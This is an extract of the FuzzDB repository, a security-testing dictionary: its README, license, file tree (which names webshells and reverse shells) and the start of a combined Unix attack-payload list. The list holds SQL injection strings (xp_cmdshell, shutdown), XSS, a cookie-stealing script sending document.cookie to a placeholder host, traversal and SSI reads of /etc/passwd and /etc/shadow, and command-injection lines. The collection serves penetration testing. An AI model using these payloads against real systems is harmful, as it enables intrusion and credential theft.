Repository: fuzzdb-project/fuzzdb Branch: master Commit: 5656ab25dc6b Files: 375 Total size: 15.5 MB Directory structure: gitextract_ea3otx92/ ├── .gitignore ├── README.md ├── _copyright.txt ├── attack/ │ ├── README.md │ ├── all-attacks/ │ │ ├── all-attacks-unix.txt │ │ ├── all-attacks-win.txt │ │ └── all-attacks-xplatform.txt │ ├── authentication/ │ │ ├── README.md │ │ └── php_magic_hashes.fuzz.txt │ ├── business-logic/ │ │ ├── CommonDebugParamNames.txt │ │ ├── CommonMethodNames.txt │ │ └── DebugParams.Json.fuzz.txt │ ├── control-chars/ │ │ ├── HexValsAllBytes.txt │ │ ├── NullByteRepresentations.txt │ │ ├── imessage.txt │ │ ├── terminal-escape-codes.txt │ │ └── true.txt │ ├── disclosure-directory/ │ │ └── directory-indexing-generic.txt │ ├── disclosure-localpaths/ │ │ └── unix/ │ │ └── common-unix-httpd-log-locations.txt │ ├── disclosure-source/ │ │ ├── README.md │ │ ├── source-disc-cmd-exec-traversal.txt │ │ ├── source-disclosure-generic.txt │ │ └── source-disclosure-microsoft.txt │ ├── email/ │ │ ├── invalid-email-addresses.txt │ │ └── valid-email-addresses.txt │ ├── file-upload/ │ │ ├── README.md │ │ ├── alt-extensions-asp.txt │ │ ├── alt-extensions-coldfusion.txt │ │ ├── alt-extensions-jsp.txt │ │ ├── alt-extensions-perl.txt │ │ ├── alt-extensions-php.txt │ │ ├── file-ul-filter-bypass-commonly-writable-directories.txt │ │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt │ │ ├── file-ul-filter-bypass-microsoft-asp.txt │ │ ├── file-ul-filter-bypass-ms-php.txt │ │ ├── file-ul-filter-bypass-x-platform-generic.txt │ │ ├── file-ul-filter-bypass-x-platform-php.txt │ │ ├── invalid-filenames-linux.txt │ │ ├── invalid-filenames-microsoft.txt │ │ ├── invalid-filesystem-chars-microsoft.txt │ │ ├── invalid-filesystem-chars-osx.txt │ │ └── malicious-images/ │ │ ├── README.md │ │ ├── eicar.com.txt │ │ └── xssproject.swf │ ├── format-strings/ │ │ └── format-strings.txt │ ├── html_js_fuzz/ │ │ ├── HTML5sec_Injections.txt │ │ ├── html_attributes.txt │ │ ├── html_tags.txt │ │ ├── javascript_events.txt │ │ ├── js_inject.txt │ │ └── quotationmarks.txt │ ├── http-protocol/ │ │ ├── README.md │ │ ├── crlf-injection.txt │ │ ├── docs.http-method-defs.html │ │ ├── hpp.txt │ │ ├── http-header-cache-poison.txt │ │ ├── http-protocol-methods.txt │ │ ├── http-request-header-field-names.txt │ │ ├── http-response-header-field-names.txt │ │ ├── known-uri-types.txt │ │ └── user-agents.txt │ ├── integer-overflow/ │ │ └── integer-overflows.txt │ ├── ip/ │ │ └── localhost.txt │ ├── json/ │ │ └── JSON_Fuzzing.txt │ ├── ldap/ │ │ ├── README.md │ │ └── ldap-injection.txt │ ├── lfi/ │ │ ├── JHADDIX_LFI.txt │ │ ├── README.md │ │ ├── common-ms-httpd-log-locations.txt │ │ └── common-unix-httpd-log-locations.txt │ ├── mimetypes/ │ │ └── MimeTypes.txt │ ├── no-sql-injection/ │ │ ├── Readme.md │ │ └── mongodb.txt │ ├── os-cmd-execution/ │ │ ├── Commands-Linux.txt │ │ ├── Commands-OSX.txt │ │ ├── Commands-Windows.txt │ │ ├── Commands-WindowsPowershell.txt │ │ ├── OSCommandInject.Windows.txt │ │ ├── README.md │ │ ├── command-execution-unix.txt │ │ ├── command-injection-template.txt │ │ ├── shell-delimiters.txt │ │ ├── shell-operators.txt │ │ ├── source-disc-cmd-exec-traversal.txt │ │ ├── useful-commands-unix.txt │ │ └── useful-commands-windows.txt │ ├── os-dir-indexing/ │ │ └── directory-indexing.txt │ ├── path-traversal/ │ │ ├── README.md │ │ ├── path-traversal-windows.txt │ │ └── traversals-8-deep-exotic-encoding.txt │ ├── redirect/ │ │ ├── README.md │ │ ├── redirect-injection-template.txt │ │ └── redirect-urls-template.txt │ ├── rfi/ │ │ ├── README.md │ │ └── rfi.txt │ ├── server-side-include/ │ │ └── server-side-includes-generic.txt │ ├── sql-injection/ │ │ ├── detect/ │ │ │ ├── GenericBlind.txt │ │ │ ├── Generic_SQLI.txt │ │ │ ├── MSSQL.txt │ │ │ ├── MSSQL_blind.txt │ │ │ ├── MySQL.txt │ │ │ ├── MySQL_MSSQL.txt │ │ │ ├── README.md │ │ │ ├── oracle.txt │ │ │ └── xplatform.txt │ │ ├── exploit/ │ │ │ ├── README.md │ │ │ ├── db2-enumeration.txt │ │ │ ├── ms-sql-enumeration.txt │ │ │ ├── mysql-injection-login-bypass.txt │ │ │ ├── mysql-read-local-files.txt │ │ │ └── postgres-enumeration.txt │ │ └── payloads-sql-blind/ │ │ ├── README.md │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ └── payloads-sql-blind-MySQL-WHERE.txt │ ├── string-expansion/ │ │ └── shell-expansion.txt │ ├── unicode/ │ │ ├── README.md │ │ ├── corrupted.txt │ │ ├── emoji.txt │ │ ├── japanese-emoticon.txt │ │ ├── naughty-unicode.txt │ │ ├── regionalindicators.txt │ │ ├── right-to-left.txt │ │ ├── specialchars.txt │ │ ├── two-byte-chars.txt │ │ └── upsidedown.txt │ ├── xml/ │ │ └── xml-attacks.txt │ ├── xpath/ │ │ ├── README.md │ │ └── xpath-injection.txt │ └── xss/ │ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt │ ├── README.md │ ├── XSSPolyglot.txt │ ├── all-encodings-of-lt.txt │ ├── default-javascript-event-attributes.txt │ ├── html-event-attributes.txt │ ├── test.xxe │ ├── xss-other.txt │ ├── xss-rsnake.txt │ └── xss-uri.txt ├── discovery/ │ ├── URI_SCHEMES/ │ │ └── IANA_registerd_URI_schemes.txt │ ├── UserAgent/ │ │ ├── UserAgentListCommon.txt │ │ ├── UserAgentListLarge.txt │ │ └── UserAgents.txt │ ├── WebSocket/ │ │ └── WebSocket-subprotocols.txt │ ├── common-methods/ │ │ └── common-methods.txt │ ├── dns/ │ │ ├── CcTLD.txt │ │ ├── alexaTop1mAXFRcommonSubdomains.txt │ │ ├── dnsmapCommonSubdomains.txt │ │ └── gTLD.txt │ └── predictable-filepaths/ │ ├── KitchensinkDirectories.txt │ ├── Randomfiles.txt │ ├── UnixDotfiles.txt │ ├── backdoors/ │ │ ├── ASP_CommonBackdoors.txt │ │ ├── bot_control_panels.txt │ │ └── shells.txt │ ├── cgi/ │ │ ├── CGI_HTTP_POST.txt │ │ ├── CGI_HTTP_POST_Windows.txt │ │ ├── CGI_Microsoft.txt │ │ └── CGI_XPlatform.txt │ ├── cms/ │ │ ├── README.md │ │ ├── drupal_plugins.txt │ │ ├── drupal_themes.txt │ │ ├── joomla_plugins.txt │ │ ├── joomla_themes.txt │ │ ├── php-nuke.txt │ │ ├── wordpress.txt │ │ ├── wp_common_theme_files.txt │ │ ├── wp_plugins.txt │ │ ├── wp_plugins_full.txt │ │ ├── wp_plugins_top225.txt │ │ ├── wp_themes.readme │ │ └── wp_themes.txt │ ├── filename-dirname-bruteforce/ │ │ ├── 3CharExtBrute.txt │ │ ├── CommonWebExtensions.txt │ │ ├── Extensions.Backup.txt │ │ ├── Extensions.Common.txt │ │ ├── Extensions.Compressed.txt │ │ ├── Extensions.Mostcommon.txt │ │ ├── Extensions.Skipfish.txt │ │ ├── WordlistSkipfish.txt │ │ ├── copy_of.txt │ │ ├── raft-large-directories-lowercase.txt │ │ ├── raft-large-directories.txt │ │ ├── raft-large-extensions-lowercase.txt │ │ ├── raft-large-extensions.txt │ │ ├── raft-large-files-lowercase.txt │ │ ├── raft-large-files.txt │ │ ├── raft-large-words-lowercase.txt │ │ ├── raft-large-words.txt │ │ ├── raft-medium-directories-lowercase.txt │ │ ├── raft-medium-directories.txt │ │ ├── raft-medium-extensions-lowercase.txt │ │ ├── raft-medium-extensions.txt │ │ ├── raft-medium-files-lowercase.txt │ │ ├── raft-medium-files.txt │ │ ├── raft-medium-words-lowercase.txt │ │ ├── raft-medium-words.txt │ │ ├── raft-small-directories-lowercase.txt │ │ ├── raft-small-directories.txt │ │ ├── raft-small-extensions-lowercase.txt │ │ ├── raft-small-extensions.txt │ │ ├── raft-small-files-lowercase.txt │ │ ├── raft-small-files.txt │ │ ├── raft-small-words-lowercase.txt │ │ ├── raft-small-words.txt │ │ ├── spanish.txt │ │ ├── test_demo.txt │ │ └── upload_variants.txt │ ├── login-file-locations/ │ │ ├── Logins.txt │ │ ├── cfm.txt │ │ ├── html.txt │ │ ├── jsp.txt │ │ ├── php.txt │ │ ├── windows-asp.txt │ │ └── windows-aspx.txt │ ├── password-file-locations/ │ │ └── Passwords.txt │ ├── php/ │ │ ├── PHP.txt │ │ └── PHP_CommonBackdoors.txt │ ├── proxy-conf.txt │ ├── tftp.txt │ ├── webservers-appservers/ │ │ ├── ADFS.txt │ │ ├── AdobeXML.txt │ │ ├── Apache.txt │ │ ├── ApacheTomcat.txt │ │ ├── Apache_Axis.txt │ │ ├── ColdFusion.txt │ │ ├── FatwireCMS.txt │ │ ├── Frontpage.txt │ │ ├── HP_System_Mgmt_Homepage.txt │ │ ├── HTTP_POST_Microsoft.txt │ │ ├── Hyperion.txt │ │ ├── IIS.txt │ │ ├── JBoss.txt │ │ ├── JRun.txt │ │ ├── JavaServlets_Common.txt │ │ ├── Joomla_exploitable.txt │ │ ├── LotusNotes.txt │ │ ├── Netware.txt │ │ ├── Oracle9i.txt │ │ ├── OracleAppServer.txt │ │ ├── README.md │ │ ├── Ruby_Rails.txt │ │ ├── SAP.txt │ │ ├── Sharepoint.txt │ │ ├── SiteMinder.txt │ │ ├── SunAppServerGlassfish.txt │ │ ├── SuniPlanet.txt │ │ ├── Vignette.txt │ │ ├── Weblogic.txt │ │ └── Websphere.txt │ └── wellknown-rfc5785.txt ├── docs/ │ ├── attack-docs/ │ │ ├── rfi-cheatsheet.html │ │ ├── source-directory-file-indexing-cheatsheet.html │ │ ├── sqli/ │ │ │ └── docs.sql_injection_cheatsheet.html │ │ ├── waf-bypass/ │ │ │ └── regexp-security-cheatsheet.md │ │ └── xss/ │ │ └── docs.wasc-scriptmapping/ │ │ ├── ScriptMapping_Release_26Nov2007.html │ │ └── license.txt │ └── misc/ │ ├── KL0209LIT_fffap.html │ └── htmlcodes-cheatsheet.htm ├── regex/ │ ├── README.md │ ├── amazon.txt │ ├── breakpoint-ignores.txt │ ├── errors.txt │ ├── nsa-wordlist.txt │ ├── pii.readme.txt │ ├── pii.txt │ └── sessionid.txt ├── web-backdoors/ │ ├── README.md │ ├── asp/ │ │ ├── cmd-asp-5.1.asp │ │ ├── cmd.asmx │ │ ├── cmd.asp │ │ ├── cmd.aspx │ │ ├── cmdasp.asp │ │ ├── cmdasp.aspx │ │ ├── dns.asp │ │ ├── file.asp │ │ ├── list.asp │ │ ├── list.txt │ │ ├── ntdaddy.asp │ │ ├── proxy.asp │ │ ├── shell.asp │ │ ├── shell.aspx │ │ └── up.asp │ ├── c/ │ │ └── cmd.c │ ├── cfm/ │ │ ├── cfExec.cfm │ │ ├── cfSQL.cfm │ │ ├── cmd.cfm │ │ └── shell.cfm │ ├── jsp/ │ │ ├── CmdServlet.java │ │ ├── ListServlet.java │ │ ├── UpServlet.java │ │ ├── browser.jsp │ │ ├── cmd.jsp │ │ ├── cmdjsp.jsp │ │ ├── jsp-reverse.jsp │ │ ├── laudanum/ │ │ │ ├── cmd.war │ │ │ ├── makewar.sh │ │ │ └── warfiles/ │ │ │ ├── META-INF/ │ │ │ │ └── MANIFEST.MF │ │ │ ├── WEB-INF/ │ │ │ │ └── web.xml │ │ │ └── cmd.jsp │ │ ├── list.jsp │ │ ├── simple.jsp │ │ ├── up.jsp │ │ └── win32/ │ │ ├── cmd_win32.jsp │ │ └── up_win32.jsp │ ├── php/ │ │ ├── cmd.php │ │ ├── dns.php │ │ ├── file.php │ │ ├── host.php │ │ ├── killnc.php │ │ ├── list.php │ │ ├── php-backdoor.php │ │ ├── php-reverse-shell.php │ │ ├── proxy.php │ │ ├── shell.php │ │ ├── simple-backdoor.php │ │ ├── tiny.php │ │ └── up.php │ ├── pl-cgi/ │ │ ├── cmd.pl │ │ ├── list.pl │ │ ├── perlcmd.cgi │ │ └── up.pl │ ├── servlet/ │ │ ├── CmdServlet.java │ │ ├── ListServlet.java │ │ └── UpServlet.java │ ├── sh/ │ │ ├── cmd.sh │ │ ├── list.sh │ │ └── up.sh │ └── wordpress/ │ ├── laudanum.php │ └── templates/ │ ├── README.md │ ├── dns.php │ ├── file.php │ ├── host.php │ ├── ipcheck.php │ ├── killnc.php │ ├── php-reverse-shell.php │ ├── proxy.php │ ├── settings.php │ └── shell.php ├── wordlists-misc/ │ ├── accidental_profanity.txt │ ├── common-http-ports.txt │ ├── numeric.txt │ ├── resolvers.txt │ ├── us_cities.txt │ ├── wordlist-alphanumeric-case.txt │ ├── wordlist-common-snmp-community-strings.txt │ └── wordlist-dna.txt └── wordlists-user-passwd/ ├── db2/ │ ├── db2_default_pass.txt │ ├── db2_default_user.txt │ └── db2_default_userpass.txt ├── faithwriters.txt ├── generic-listpairs/ │ ├── http_default_pass.txt │ ├── http_default_userpass.txt │ └── http_default_users.txt ├── names/ │ └── namelist.txt ├── oracle/ │ ├── _hci_oracle_passwords.txt │ ├── _oracle_default_passwords.txt │ ├── oracle_login_password.txt │ ├── oracle_logins.txt │ └── oracle_passwords.txt ├── passwds/ │ ├── john.txt │ ├── phpbb.txt │ ├── twitter.txt │ └── weaksauce.txt ├── postgres/ │ ├── postgres_default_pass.txt │ ├── postgres_default_user.txt │ └── postgres_default_userpass.txt ├── readme.txt ├── tomcat/ │ ├── tomcat_mgr_default_pass.txt │ ├── tomcat_mgr_default_userpass.txt │ └── tomcat_mgr_default_users.txt └── unix-os/ ├── unix_passwords.txt └── unix_users.txt ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ *.DS_Store ================================================ FILE: README.md ================================================ FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses. **Attack Patterns -** FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing. These patterns, categorized by attack and where appropriate platform type, are known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, XSS, http header crlf injections, SQL injection, NoSQL injection, and more. For example, FuzzDB catalogs 56 patterns that can potentially be interpreted as a null byte and contains lists of [commonly used methods](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonMethodNames.txt) such as "get, put, test," and name-value pairs than [trigger debug modes](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt).
**Discovery -** The popularity of standard software packaging distribution formats and installers resulted in resources like [logfiles and administrative directories](http://www.owasp.org/index.php/Forced_browsing) frequently being located in a small number of [predictable locations](https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery/predictable-filepaths). FuzzDB contains a comprehensive dictionary, sorted by platform type, language, and application, making brute force testing less brutish.
https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery **Response Analysis -** Many interesting server responses are [predictable strings](https://github.com/fuzzdb-project/fuzzdb/tree/master/regex). FuzzDB contains a set of regex pattern dictionaries to match against server responses. In addition to common server error messages, FuzzDB contains regex for credit cards, social security numbers, and more.
**Other useful stuff -** Webshells in different languages, common password and username lists, and some handy wordlists. **Documentation -** Many directories contain a README.md file with usage notes. A collection of [documentation](https://github.com/fuzzdb-project/fuzzdb/tree/master/docs) from around the web that is helpful for using FuzzDB to construct test cases is also included.
### Usage tips for pentesting with FuzzDB ### https://github.com/fuzzdb-project/fuzzdb/wiki/usagehints ### How people use FuzzDB ### FuzzDB is like an application security scanner, without the scanner. Some ways to use FuzzDB: * Website and application service black-box penetration testing with * [OWASP Zap](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) proxy's FuzzDB Zap Extension * Burp Proxy's [intruder](http://portswigger.net/intruder/) tool and scanner * [PappyProxy](http://www.pappyproxy.com/), a console-based intercepting proxy * To identify interesting service responses using grep patterns for PII, credit card numbers, error messages, and more * Inside custom tools for testing software and application protocols * Crafting security test cases for GUI or command line software with standard test automation tools * Incorporating into other Open Source software or commercial products * In training materials and documentation * To learn about software exploitation techniques * To improve your security testing product or service ### How were the patterns collected? ### Many, many hours of research and pentesting. And * analysis of default app installs * analysis of system and application documentation * analysis of error messages * researching old web exploits for repeatable attack strings * scraping scanner payloads from http logs * various books, articles, blog posts, mailing list threads * other open source fuzzers and pentest tools and the input of contributors: https://github.com/fuzzdb-project/fuzzdb/graphs/contributors ### Places you can find FuzzDB ### Other security tools and projects that incorporate FuzzzDB in whole or part * OWASP Zap Proxy fuzzdb plugin https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project * SecLists https://github.com/danielmiessler/SecLists * TrustedSec Pentesters Framework https://github.com/trustedsec/ptf * Rapid7 Metasploit https://github.com/rapid7/metasploit-framework * Portswigger Burp Suite http://portswigger.net * Protofuzz https://github.com/trailofbits/protofuzz * BlackArch Linux https://www.blackarch.org/ * ArchStrike Linux https://archstrike.org/ ### Download ### **Preferred method is to check out sources via git, new payloads are added frequently** ``` git clone https://github.com/fuzzdb-project/fuzzdb.git --depth 1 ``` While in the FuzzDB dir, you can update your local repo with the command ``` git pull ``` This Stackoverflow gives ideas on how to keep a local repository tidy: https://stackoverflow.com/questions/38171899/how-to-reduce-the-depth-of-an-existing-git-clone/46004595#46004595 You can also browse the [FuzzDB github sources](https://github.com/fuzzdb-project/fuzzdb/) and there is always a fresh [zip file](https://github.com/fuzzdb-project/fuzzdb/archive/master.zip) Note: Some antivirus/antimalware software will alert on FuzzDB. To resolve, the filepath should be whitelisted. There is nothing in FuzzDB that can harm your computer as-is, however due to the risk of local file include attacks it's not recommended to store this repository on a server or other important system. Use at your own risk. ### Who ### FuzzDB was created by Adam Muntner (amuntner @ gmail.com) FuzzDB (c) Copyright Adam Muntner, 2010-2019 Portions copyrighted by others, as noted in commit comments and README.md files. The FuzzDB license is New BSD and Creative Commons by Attribution. The ultimate goal of this project is to make the patterns contained within obsolete. If you use this project in your work, research, or commercial product, you are required to cite it. That's it. I always enjoy hearing about how people are using it to find an interesting bug or in a tool, send me an email and let me know. Submissions are always welcome! Official FuzzDB project page: [https://github.com/fuzzdb-project/fuzzdb/](https://github.com/fuzzdb-project/fuzzdb/) ================================================ FILE: _copyright.txt ================================================ Copyright (c) 2010-2019, Adam Muntner All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. Neither the name of fuzzdb nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Licensed under Creative Commons - By Attribution see http://creativecommons.org/licenses/by/3.0/legalcode ---- contains dictionaries from Skipfish Copyright 2010 Michal Zalewski Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ---- The MIT License (MIT) Copyright (c) 2015 Max Woolf Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: attack/README.md ================================================

FuzzDB Attack Patterns

**WAF Evasion**
* Regexp security Cheatsheet * Source: https://github.com/attackercan/regexp-security-cheatsheet/blob/master/README.md ================================================ FILE: attack/all-attacks/all-attacks-unix.txt ================================================ ! !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() " " or "a"="a " or "x"="x " or 0=0 # " or 0=0 -- " or 1=1 or ""=" " or 1=1-- "' or 1 --'" ") or ("a"="a "]>&xxe;" "]>&xxe;" "" "SCRIPT]]>alert('XSS');/SCRIPT]]>" "XSS" "cript:alert('XSS')"">" "]]>" "> "> ">xxx

yyy "\t" # #' #' #xA #xA#xD #xD #xD#xA $NULL $null % %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow %00/ %00/etc/passwd%00 %01%02%03%04%0a%0d%0aADSF %08x %0A/usr/bin/id %0A/usr/bin/id%0A %0Aid %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %oa ping -n 30 127.0.0.1 %0a %0a id %0a %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a %0d %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a %0d%0aX-Injection-Header:%20AttackValue %20 %20$(sleep%2050) %20'sleep%2050' %20d %20n %20s %20x %20| %21 %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %2500 %250a %26 %27%20or%201=1 %28 %29 %2A %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C %2C %2e%2e%2f %3C %3C%3F %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %5C %5C/ %60 %7C %7f %99999999999s %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %ff %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x & & id & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < ' '%20OR &id < < <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <>"'%;)(&+ <script>alert(document.cookie);<script>alert <script>alert(document.cookie); ";id" ' ' (select top 1 ' -- ' ; ' UNION ALL SELECT ' UNION SELECT ' or ''=' ' or '1'='1 ' or '1'='1'-- ' or 'x'='x ' or (EXISTS) ' or 0=0 # ' or 0=0 -- ' or 1 in (@@version)-- ' or 1=1 or ''=' ' or 1=1-- ' or a=a-- ' or uid like '% ' or uname like '% ' or user like '% ' or userid like '% ' or username like '% '%20or%201=1 '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E '';!--"=&{()} ') or ('a'='a '-- '; exec master..xp_cmdshell '; exec xp_regread '; waitfor delay '0:30:0'-- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} ';shutdown-- '> '> 'hi' or 'x'='x'; 'or select * 'sqlattempt1 '||UTL_HTTP.REQUEST '||Utl_Http.request('http://') from dual-- ( (') (sqlattempt2) ) )))))))))) * *' *' *(|(mail=*)) *(|(objectclass=*)) */* *| + +%00 ,@variable - -- --'; --sp_password -1 -1.0 -2 -20 -268435455 ..%%35%63 ..%%35c ..%25%35%63 ..%255c ..%5c ..%bg%qf ..%c0%af ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini ..%u2215 